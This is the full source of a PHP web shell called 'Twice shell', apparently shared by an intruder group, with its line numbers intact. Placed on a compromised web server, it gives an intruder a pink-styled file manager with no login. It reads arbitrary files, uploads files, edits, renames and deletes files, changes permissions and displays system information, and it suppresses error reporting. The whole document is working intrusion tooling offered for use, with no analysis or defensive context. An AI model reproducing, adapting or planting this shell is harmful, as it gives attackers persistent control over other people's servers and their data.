ss

1. <?php
2.  
3. //Redesign by ./M4RY_PR0S4 - Security Ghost
4. //made with love
5.  
6. error_reporting(0);
7. set_time_limit(0);
8.  
9. if(get_magic_quotes_gpc()){
10. foreach($_POST as $key=>$value){
11. $_POST[$key] = stripslashes($value);
12. }
13. }
14. echo '<!DOCTYPE HTML>
15. <html>
16. <head>
17. <link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
18. <link href="" rel="stylesheet" type="text/css">
19. <title>Twice shell</title>
20. <style>
21. body{
22. font-family: "Racing Sans One", cursive;
23. background-color: pink;
24. color:white;
25. }
26. #content tr:hover{
27. background-color: pink;
28. text-shadow:0px 0px 10px #fff;
29. }
30. #content .first{
31. background-color: pink;
32. }
33. table{
34. border: 1px #000000 dotted;
35. }
36. a{
37. color:white;
38. text-decoration: none;
39. }
40. a:hover{
41. color:pink;
42. text-shadow:0px 0px 10px #ffffff;
43. }
44. input,select,textarea{
45. border: 1px #000000 solid;
46. -moz-border-radius: 5px;
47. -webkit-border-radius:5px;
48. border-radius:5px;
49. }
50. </style>
51. </head>
52. <body>
53. <style>
54. body{
55. background-image:url(https://wallpapercave.com/wp/wp2233136.jpg);
56. background-size:cover;
57. background-attachment: fixed;
58. }
59. p{
60. color:white;
61. }
62. </style>
63. <h1><center><font color="pink">Tofu Twice</font></center></h1>
64. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
65. <tr><td><font color="white">Path :</font> ';
66. if(isset($_GET['path'])){
67. $path = $_GET['path'];
68. }else{
69. $path = getcwd();
70. }
71. $path = str_replace('\\','/',$path);
72. $paths = explode('/',$path);
73.  
74. foreach($paths as $id=>$pat){
75. if($pat == '' && $id == 0){
76. $a = true;
77. echo '<a href="?path=/">/</a>';
78. continue;
79. }
80. if($pat == '') continue;
81. echo '<a href="?path=';
82. for($i=0;$i<=$id;$i++){
83. echo "$paths[$i]";
84. if($i != $id) echo "/";
85. }
86. echo '">'.$pat.'</a>/';
87. }
88. echo '</td></tr><tr><td>';
89. $kernel = php_uname();
90. echo "System: <font color=white>".$kernel."</font><br>";
91. if(isset($_FILES['file'])){
92. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
93. echo '<font color="white">Daebak Success</font><br />';
94. }else{
95. echo '<font color="red">Mianhae Failed </font><br/>';
96. }
97. }
98. echo '<form enctype="multipart/form-data" method="POST">
99. <font color="white">File Upload :</font> <input type="file" name="file" />
100. <input type="submit" value="upload" />
101. </form>
102. </td></tr>';
103. if(isset($_GET['filesrc'])){
104. echo "<tr><td>Current File : ";
105. echo $_GET['filesrc'];
106. echo '</tr></td></table><br />';
107. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
108. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
109. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
110. if($_POST['opt'] == 'chmod'){
111. if(isset($_POST['perm'])){
112. if(chmod($_POST['path'],$_POST['perm'])){
113. echo '<font color="white">Change Permission Succes</font><br/>';
114. }else{
115. echo '<font color="black">Change Permission Gagal</font><br />';
116. }
117. }
118. echo '<form method="POST">
119. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
120. <input type="hidden" name="path" value="'.$_POST['path'].'">
121. <input type="hidden" name="opt" value="chmod">
122. <input type="submit" value="Go" />
123. </form>';
124. }elseif($_POST['opt'] == 'rename'){
125. if(isset($_POST['newname'])){
126. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
127. echo '<font color="white">Ganti Nama Succes</font><br/>';
128. }else{
129. echo '<font color="black">Ganti Nama Gagal</font><br />';
130. }
131. $_POST['name'] = $_POST['newname'];
132. }
133. echo '<form method="POST">
134. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
135. <input type="hidden" name="path" value="'.$_POST['path'].'">
136. <input type="hidden" name="opt" value="rename">
137. <input type="submit" value="Go" />
138. </form>';
139. }elseif($_POST['opt'] == 'edit'){
140. if(isset($_POST['src'])){
141. $fp = fopen($_POST['path'],'w');
142. if(fwrite($fp,$_POST['src'])){
143. echo '<font color="white">Daebak Success</font><br/>';
144. }else{
145. echo '<font color="red">Mianhae Failed</font><br/>';
146. }
147. fclose($fp);
148. }
149. echo '<form method="POST">
150. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
151. <input type="hidden" name="path" value="'.$_POST['path'].'">
152. <input type="hidden" name="opt" value="edit">
153. <input type="submit" value="Save" />
154. </form>';
155. }
156. echo '</center>';
157. }else{
158. echo '</table><br/><center>';
159. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
160. if($_POST['type'] == 'dir'){
161. if(rmdir($_POST['path'])){
162. echo '<font color="white">Directory Terhapus</font><br/>';
163. }else{
164. echo '<font color="black">Directory Gagal Terhapus </font><br/>';
165. }
166. }elseif($_POST['type'] == 'file'){
167. if(unlink($_POST['path'])){
168. echo '<font color="white">File Terhapus</font><br/>';
169. }else{
170. echo '<font color="black">File Gagal Dihapus</font><br/>';
171. }
172. }
173. }
174. echo '</center>';
175. $scandir = scandir($path);
176. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
177. <tr class="first">
178. <td><center>Name</peller></center></td>
179. <td><center>Size</peller></center></td>
180. <td><center>Permission</peller></center></td>
181. <td><center>Modify</peller></center></td>
182. </tr>';
183.  
184.  
185. foreach($scandir as $dir){
186. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
187. echo '<tr>
188. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
189. <td><center>--</center></td>
190. <td><center>';
191. if(is_writable($path.'/'.$dir)) echo '<font color="pink">';
192. elseif(!is_readable($path.'/'.$dir)) echo '<font color="white">';
193. echo perms($path.'/'.$dir);
194. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
195.  
196. echo '</center></td>
197. <td><center><form method="POST" action="?option&path='.$path.'">
198. <select name="opt">
199. <option value="">Select</option>
200. <option value="delete">Delete</option>
201. <option value="chmod">Chmod</option>
202. <option value="rename">Rename</option>
203. </select>
204. <input type="hidden" name="type" value="dir">
205. <input type="hidden" name="name" value="'.$dir.'">
206. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
207. <input type="submit" value=">">
208. </form></center></td>
209. </tr>';
210. }
211. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
212. foreach($scandir as $file){
213. if(!is_file($path.'/'.$file)) continue;
214. $size = filesize($path.'/'.$file)/1024;
215. $size = round($size,3);
216. if($size >= 1024){
217. $size = round($size/1024,2).' MB';
218. }else{
219. $size = $size.' KB';
220. }
221.  
222. echo '<tr>
223. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
224. <td><center>'.$size.'</center></td>
225. <td><center>';
226. if(is_writable($path.'/'.$file)) echo '<font color="pink">';
227. elseif(!is_readable($path.'/'.$file)) echo '<font color="white">';
228. echo perms($path.'/'.$file);
229. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
230. echo '</center></td>
231. <td><center><form method="POST" action="?option&path='.$path.'">
232. <select name="opt">
233. <option value="">Select</option>
234. <option value="delete">Delete</option>
235. <option value="chmod">Chmod</option>
236. <option value="rename">Rename</option>
237. <option value="edit">Edit</option>
238. </select>
239. <input type="hidden" name="type" value="file">
240. <input type="hidden" name="name" value="'.$file.'">
241. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
242. <input type="submit" value=">">
243. </form></center></td>
244. </tr>';
245. }
246. echo '</table>
247. </div>';
248. }
249. echo '<center><a href="https://www.facebook.com/twice" target="_blank"><br/>Powered by Twice</center>
250. </body>
251. </html>';
252. function perms($file){
253. $perms = fileperms($file);
254.  
255. if (($perms & 0xC000) == 0xC000) {
256. // Socket
257. $info = 's';
258. } elseif (($perms & 0xA000) == 0xA000) {
259. // Symbolic Link
260. $info = 'l';
261. } elseif (($perms & 0x8000) == 0x8000) {
262. // Regular
263. $info = '-';
264. } elseif (($perms & 0x6000) == 0x6000) {
265. // Block special
266. $info = 'b';
267. } elseif (($perms & 0x4000) == 0x4000) {
268. // Directory
269. $info = 'd';
270. } elseif (($perms & 0x2000) == 0x2000) {
271. // Character special
272. $info = 'c';
273. } elseif (($perms & 0x1000) == 0x1000) {
274. // FIFO pipe
275. $info = 'p';
276. } else {
277. // Unknown
278. $info = 'u';
279. }
280.  
281. // Owner
282. $info .= (($perms & 0x0100) ? 'r' : '-');
283. $info .= (($perms & 0x0080) ? 'w' : '-');
284. $info .= (($perms & 0x0040) ?
285. (($perms & 0x0800) ? 's' : 'x' ) :
286. (($perms & 0x0800) ? 'S' : '-'));
287.  
288. // Group
289. $info .= (($perms & 0x0020) ? 'r' : '-');
290. $info .= (($perms & 0x0010) ? 'w' : '-');
291. $info .= (($perms & 0x0008) ?
292. (($perms & 0x0400) ? 's' : 'x' ) :
293. (($perms & 0x0400) ? 'S' : '-'));
294.  
295. // World
296. $info .= (($perms & 0x0004) ? 'r' : '-');
297. $info .= (($perms & 0x0002) ? 'w' : '-');
298. $info .= (($perms & 0x0001) ?
299. (($perms & 0x0200) ? 't' : 'x' ) :
300. (($perms & 0x0200) ? 'T' : '-'));
301.  
302. return $info;
303. }
304. ?>